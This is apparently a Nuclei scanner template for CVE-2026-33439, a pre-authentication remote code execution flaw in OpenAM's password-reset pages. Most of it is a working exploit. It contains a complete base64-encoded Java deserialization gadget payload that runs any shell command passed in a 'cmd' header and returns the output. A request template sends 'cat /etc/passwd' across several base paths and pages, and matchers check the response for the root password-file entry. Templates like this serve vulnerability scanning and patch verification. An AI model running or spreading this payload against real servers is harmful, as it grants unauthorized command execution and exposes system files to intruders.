README.md
Rendering markdown...
id: CVE-2026-33439
info:
name: OpenAM Pre-Auth RCE via jato.clientSession Deserialization
author: ibonok
severity: critical
description: |
Pre-authentication Remote Code Execution in ForgeRock/OpenIdentityPlatform OpenAM.
The jato.clientSession parameter on unauthenticated Password Reset pages is
deserialized via Encoder.deserialize() without any class whitelist filtering.
Uses Click1 + External Xalan TemplatesImpl gadget chain with JATO RequestManager
echo technique — command output is returned directly in the HTTP response.
reference:
- https://github.com/OpenIdentityPlatform/OpenAM/commit/014007c63cacc834cc795a89fac0e611aebc4a32
classification:
cvss-score: 9.8
cve-id: CVE-2026-33439
tags: cve,cve2026,openam,deserialization,rce,java
variables:
payload: "AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAABzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAKW9yZy5hcGFjaGUueGFsYW4ueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAdJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhMAAtfYXV4Q2xhc3Nlc3QAKkxvcmcvYXBhY2hlL3hhbGFuL3hzbHRjL3J1bnRpbWUvSGFzaHRhYmxlO1sACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAAAAAAAHB1cgADW1tCS_0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAJdsr-ur4AAAA0AIUKAAIAAwcABAwABQAGAQAvb3JnL2FwYWNoZS94YWxhbi94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBAAY8aW5pdD4BAAMoKVYIAAgBAB9jb20uaXBsYW5ldC5qYXRvLlJlcXVlc3RNYW5hZ2VyCgAKAAsHAAwMAA0ADgEAD2phdmEvbGFuZy9DbGFzcwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7CAAQAQARZ2V0UmVxdWVzdENvbnRleHQKAAoAEgwAEwAUAQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwcAFgEAEGphdmEvbGFuZy9PYmplY3QKABgAGQcAGgwAGwAcAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgAVAB4MAB8AIAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwgAIgEACmdldFJlcXVlc3QIACQBAAtnZXRSZXNwb25zZQgAJgEACWdldEhlYWRlcgcAKAEAEGphdmEvbGFuZy9TdHJpbmcIACoBAANjbWQKACcALAwALQAuAQAHaXNFbXB0eQEAAygpWggAMAEABy9iaW4vc2gIADIBAAItYwcANAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgoAMwA2DAAFADcBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWCgAzADkMADoAOwEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwoAMwA9DAA-AD8BAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwoAQQBCBwBDDABEAEUBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsHAEcBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQoARgADCgBKAEsHAEwMAE0ATgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAARyZWFkAQAFKFtCKUkKAEYAUAwAUQBSAQAFd3JpdGUBAAcoW0JJSSlWCgBKAFQMAFUABgEABWNsb3NlCgBGAFcMAFgAWQEAC3RvQnl0ZUFycmF5AQAEKClbQggAWwEADnNldENvbnRlbnRUeXBlCABdAQAKdGV4dC9wbGFpbggAXwEACXNldFN0YXR1cwkAYQBiBwBjDABkAGUBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwoAYQBnDABoAGkBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwgAawEAD2dldE91dHB1dFN0cmVhbQgAUQcAbgEAAltCCABwAQAFZmx1c2gIAHIBAAtmbHVzaEJ1ZmZlcgcAdAEAE2phdmEvbGFuZy9FeGNlcHRpb24HAHYBAAxFdmlsVHJhbnNsZXQBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAJdHJhbnNmb3JtAQBQKExvcmcvYXBhY2hlL3hhbGFuL3hzbHRjL0RPTTtbTG9yZy9hcGFjaGUveG1sL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwB9AQAob3JnL2FwYWNoZS94YWxhbi94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAcyhMb3JnL2FwYWNoZS94YWxhbi94c2x0Yy9ET007TG9yZy9hcGFjaGUveG1sL2R0bS9EVE1BeGlzSXRlcmF0b3I7TG9yZy9hcGFjaGUveG1sL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHAIIBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAKU291cmNlRmlsZQEAEUV2aWxUcmFuc2xldC5qYXZhACEAdQACAAAAAAAEAAEABQAGAAEAdwAAAB0AAQABAAAABSq3AAGxAAAAAQB4AAAABgABAAAABgABAHkAegACAHcAAAAZAAAAAwAAAAGxAAAAAQB4AAAABgABAAAAIAB7AAAABAABAHwAAQB5AH4AAgB3AAAAGQAAAAQAAAABsQAAAAEAeAAAAAYAAQAAACEAewAAAAQAAQB8AAgAfwAGAAEAdwAAAjwABgANAAABixIHuAAJSyoSDwO9AAq2ABEBA70AFbYAF0wrtgAdEiEDvQAKtgARKwO9ABW2ABdNK7YAHRIjA70ACrYAESsDvQAVtgAXTiy2AB0SJQS9AApZAxInU7YAESwEvQAVWQMSKVO2ABfAACc6BBkExgEbGQS2ACuaARMGvQAnWQMSL1NZBBIxU1kFGQRTOgW7ADNZGQW3ADUEtgA4tgA8OgYZBrYAQDoHuwBGWbcASDoIERAAvAg6CRkHGQm2AElZNgqeABAZCBkJAxUKtgBPp__pGQe2AFMZCLYAVjoLLbYAHRJaBL0AClkDEidTtgARLQS9ABVZAxJcU7YAF1cttgAdEl4EvQAKWQOyAGBTtgARLQS9ABVZAxEAyLgAZlO2ABdXLbYAHRJqA70ACrYAES0DvQAVtgAXOgwZDLYAHRJsBL0AClkDEm1TtgARGQwEvQAVWQMZC1O2ABdXGQy2AB0SbwO9AAq2ABEZDAO9ABW2ABdXLbYAHRJxA70ACrYAES0DvQAVtgAXV6cABEuxAAEAAAGGAYkAcwACAHgAAABaABYAAAAJAAYACgAZAAsALwAMAEUADQBpAA4AdgAPAIsAEACdABEApAASAK0AEwC0ABQAzgAVANMAFgDaABcA-gAYAR8AGQE2ABoBWAAbAXAAHAGGAB4BigAfAIAAAAA3AAX_ALQACgcACgcAFQcAFQcAFQcAJwcAgQcAQQcASgcARgcAbQAA_AAZAf8AtwAAAABCBwBzAAABAIMAAAACAIRwdAAFUHduZWRwdwEAeHEAfgAieA"
http:
- raw:
- |
GET /{{basepath}}/ui/{{page}}?jato.clientSession={{payload}} HTTP/1.1
Host: {{Hostname}}
cmd: cat /etc/passwd
Connection: close
payloads:
basepath:
- sso
- openam
- auth
- opensso
- am
page:
- PWResetUserValidation
- PWResetQuestion
- PWResetSuccess
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 0
regex:
- "(?m)^.*:.*:\\d+:\\d+:.*$"